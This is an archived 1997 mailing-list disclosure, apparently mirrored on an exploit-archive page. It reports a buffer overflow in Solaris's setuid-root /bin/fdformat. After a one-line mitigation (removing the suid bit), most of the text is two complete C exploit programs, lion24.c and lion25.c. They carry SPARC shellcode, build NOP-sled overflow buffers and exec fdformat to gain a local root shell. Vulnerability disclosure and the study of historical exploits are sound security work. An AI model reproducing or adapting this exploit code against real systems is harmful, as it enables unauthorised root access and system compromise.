Solaris /bin/fdformat overflow sploit

Summary
Description:Buffer overflow in find_media() in /bin/fdformat
Author:Cristian Schipor (skipo@Math.PUB.Ro)
Compromise: root (local)
Vulnerable Systems:Solaris 2.4, 2.5
Date:23 March 1997
Details

Exploit:

Date: Sun, 23 Mar 1997 17:57:12 +0200 (EET)
From: Cristian Schipor 
Reply-To: best-of-security@suburbia.net
To: best-of-security@suburbia.net
Cc: best-of-security@suburbia.net
Subject: BoS:  Remake: buffer overflow in /bin/fdformat + exploit 
(Solaris2.X)
Resent-Date: Mon, 24 Mar 1997 03:29:45 +1100 (EST)
Resent-From: best-of-security@suburbia.net


motto: " No one would have believed in the last years of the nineteenth
century that this world was being watched keenly and closely by
intelligences greater than man's and yet as mortal as his own; that as men
busied themselves about their various concerns they were scrutinised and
studied, perhaps almost as narrowly as a man with a microscope might scru-
tinise the transient creatures that swarm and multiply in a drop of
water."
                        H.G.Wells - "The War of the Worlds"


Sun Mar 23 16:56:15 EET 1997 Romania

"Remake for bufer-overflow in find_media() now in /bin/fdformat"

The buffer overflow bug I posted to you in Mar 13 1997 is present in
/bin/fdformat too (which has in may solaris 2.4 and 2.5.1 distributions
the suid-exec bit on and it is owned by root). By exploiting fdformat with
suid-exec bit on, anyone can gain a root (or who is the owner of fdformat)
shell. So, to prevent an fdformat exploit, remove the suid-exec bit from
/bin/fdformat. 

Cristian Schipor - Computer Science Faculty - Bucharest - Romania
Email: skipo@math.pub.ro, skipo@sundy.cs.pub.ro, skipo@ns.ima.ro
Phone: 401-410.60.88

See http://www.math.pub.ro/security

My exploits (with argv[1] you can change the STACK_OFFSET, +- x, x=8*k
k=1,2,3,...): 

--------------------------- lion24.c ---------------------------------
/*
Solaris 2.4
*/

  #include 
   #include 
   #include 
   #include 
   
   #define BUF_LENGTH 264
   #define EXTRA 36
   #define STACK_OFFSET -56
   #define SPARC_NOP 0xa61cc013
   
   u_char sparc_shellcode[] =

   "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
   "\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14"
   "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
   "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
   "\x91\xd0\x20\x08"
   ;
   
   u_long get_sp(void)
   {
   __asm__("mov %sp,%i0 \n");
   }
   
   void main(int argc, char *argv[])
   {
   char buf[BUF_LENGTH + EXTRA + 8];
   long targ_addr;
   u_long *long_p;
   u_char *char_p;
   int i, code_length = strlen(sparc_shellcode),dso=0;
   
   if(argc > 1) dso=atoi(argv[1]);
   
   long_p =(u_long *) buf ;
   targ_addr = get_sp() - STACK_OFFSET - dso;
   
   for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
   *long_p++ = SPARC_NOP;
   
   char_p = (u_char *) long_p;
   
   for (i = 0; i < code_length; i++)
   *char_p++ = sparc_shellcode[i];
   
   long_p = (u_long *) char_p;
   
   for (i = 0; i < EXTRA / sizeof(u_long); i++)
   *long_p++ =targ_addr;
   
   printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
   targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
   execl("/bin/fdformat", "fdformat   ", &buf[0],(char *) 0);
   perror("execl failed");
   }
------------------------------ end of lion24.c --------------------------

-------------------------------- lion25.c ------------------------------
/* 
Solaris 2.5.1 - this exploited was compiled on Solaris2.4 and tested on
2.5.1
*/

   #include 
   #include 
   #include 
   #include 
   
   #define BUF_LENGTH 364
   #define EXTRA 400
   #define STACK_OFFSET 704
   #define SPARC_NOP 0xa61cc013
   
   u_char sparc_shellcode[] =

   "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
   "\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14"
   "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
   "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
   "\x91\xd0\x20\x08"
   ;
   
   u_long get_sp(void)
   {
   __asm__("mov %sp,%i0 \n");
   }
   void main(int argc, char *argv[])
   {
   char buf[BUF_LENGTH + EXTRA + 8];
   long targ_addr;
   u_long *long_p;
   u_char *char_p;
   int i, code_length = strlen(sparc_shellcode),dso=0;
   
   if(argc > 1) dso=atoi(argv[1]);
   
   long_p =(u_long *) buf ;
   targ_addr = get_sp() - STACK_OFFSET - dso;
   for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
   *long_p++ = SPARC_NOP;
   
   char_p = (u_char *) long_p;
   
   for (i = 0; i < code_length; i++)
   *char_p++ = sparc_shellcode[i];
   
   long_p = (u_long *) char_p;
   
   for (i = 0; i < EXTRA / sizeof(u_long); i++)
   *long_p++ =targ_addr;
   
   printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
   targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
   execl("/bin/fdformat", "fdformat", & buf[1],(char *) 0);
   perror("execl failed");
   }

--------------------------- end of lion25.c -------------------------------



More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]